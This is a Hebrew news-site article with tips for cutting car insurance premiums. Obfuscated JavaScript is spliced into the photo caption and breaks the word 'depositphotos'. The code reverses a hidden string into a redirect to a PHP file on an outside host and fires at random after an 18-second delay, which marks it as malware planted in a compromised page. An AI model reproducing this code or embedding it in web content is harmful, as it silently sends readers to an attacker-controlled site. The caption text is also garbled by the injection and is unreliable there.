fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

5 דרכים להוזיל את ביטוח הרכב שלכם

שאלת המחיר רלוונטית בכל הנוגע לביטוח מקיף או לכיסוי נפרד לצד ג'. לכן, ריכזנו עבורכם טיפים שיעזרו לכם להוזיל ככל הניתן את הפרמיה החודשית ואת גובה ההשתתפות העצמית בתרחישים שונים.
הוזלת ביטוח רכב | צילום: depositphotos
הוזלת ביטוח רכב | צילום: depositpho$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos

החשיבות של ביטוח רכב ברורה: זו הדרך שלכם להגן על עצמכם, מבחינה כלכלית ובריאותית, מפני כל תרחיש שעלול להתרחש אשר מערב את הרכב שלכם. כיום, קל יותר מאי פעם לבטח את הרכב. ניתן להשוות מחירים ולרכוש ביטוח רכב אונליין, ולמעשה לקבל את התנאים הטובים ביותר בלי לצאת בכלל מהבית.

ביטוח חובה כולם חייבים לעשות והוא קבוע, ולכן אין הרבה טעם לדבר על המחיר שלו, אבל בכל הנוגע לביטוח מקיף או לכיסוי נפרד לצד ג' (עבור מי שמעדיף לא לרכוש ביטוח מקיף) כמובן ששאלת המחיר רלוונטית מאוד. עליכם להרכיב פוליסה מותאמת אישית לצרכים שלכם, לוודא שאתם מכניסים לפוליסה בדיוק את הכיסויים שאתם צריכים, ולנסות להוזיל ככל הניתן את הפרמיה החודשית ואת גובה ההשתתפות העצמית בתרחישים שונים.

קבלו חמישה טיפים להוזלת העלויות של ביטוח הרכב שלכם:

ביטוח רכב אונליין

רכישת ביטוח רכב אונליין היא לא רק נוחה וחסכנית בזמן, היא עשויה גם מאוד להשתלם לכם. חברות הביטוח אשר מוכרות ביטוח רכב אונליין, יכולות להרשות לעצמן להציע מחירים נמוכים יחסית. הן לא משלמות למתווכים ופועלות על פי מודל עסקי שלהן מאוד יעיל כלכלית יותר מאשר בעבר. כל זה עובד לטובת הלקוחות, שזוכים למחירים נוחים.

השוואה ומיקוח

לפי שרוכשים פוליסת ביטוח רכב אונליין, טלפונית או בפגישה פיזית, חשוב להשוות מחירים והצעות שונות. בררו איזה הנחות והטבות מציעה כל חברת ביטוח, וכאשר אתם בוחרים אחת מהן, תרכשו ממנה גם את ביטוח החובה וגם את המקיף (או צד ג'). בנוסף, ניהול משא ומתן עם חברות הביטוח עשוי בהחלט להביא להקלה בעלויות. למשל, אם אתם מבטחים יותר מרכב אחד, כדאי לציין זאת במטרה לקבל הנחת "רכב שני".

נהיגה בטוחה וזהירה

היסטוריית הנהיגה שלכם משפיעה על מחיר הביטוח. אם בעברכם תביעות ביטוח רכב, עבירות תנועה וכו', תצטרכו לשלם יותר. לכן, לצד הצורך הברור מאליו בנהיגה זהירה מטעמי בטיחות, סיבה נוספת להקפיד על כך היא כלכלית. מעבר לזה, מיגון הרכב באמצעי בטיחות מתקדמים גם הוא יכול להשפיע לטובה על המחיר. קיימים אמצעי מיגון מסוימים אשר חברות הביטוח דורשות לפני החתימה על הפוליסה, אך יש אפשרות להוסיף עליהם וכך לקבל הנחה.

ביטוח לפי קילומטראז'

כמעט כל חברות הביטוח מציעות פוליסות של ביטוח מקיף, להן רכיב הנחה על מיעוט בנסיעה. זהו אינטרס שלהן, שתעלו על הכביש כמה שפחות ותורידו את הסיכוי להפעלת הביטוח, ולכן הם מוכנות להעניק הנחות על כך.

מאפייני הרכב ואזור המגורים

ביטוח עבור רכב יוקרתי או נדיר עולה יותר, וכך גם ביטוח עבור רכב שנחשב אהוב על ידי גנבים. קיימות סטטיסטיקות על סוגי וצבעי רכבים שנוטים להיגנב יותר מאחרים, והמחיר מושפע מכך. בנוסף, אם אתם גרים באזור בו גניבות רכב הן נפוצות, תצטרכו לשלם בהתאם.

 

 

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות